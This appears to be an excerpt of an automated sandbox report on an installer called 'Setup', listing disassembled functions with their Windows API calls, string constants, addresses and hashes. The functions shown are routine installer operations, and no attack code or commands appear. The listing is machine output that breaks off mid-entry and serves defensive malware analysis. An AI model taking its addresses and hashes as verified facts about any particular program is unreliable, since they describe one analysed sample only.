                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                        APIs
                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                        • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                        • String ID: F$N$open
                                                                                                                                        • API String ID: 3928313111-1104729357
                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                        APIs
                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                        • String ID: F
                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                        Strings
                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                        Strings
                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                        • PCk, xrefs: 00402473
                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$PCk$`G
                                                                                                                                        • API String ID: 1033533793-3626080995
                                                                                                                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
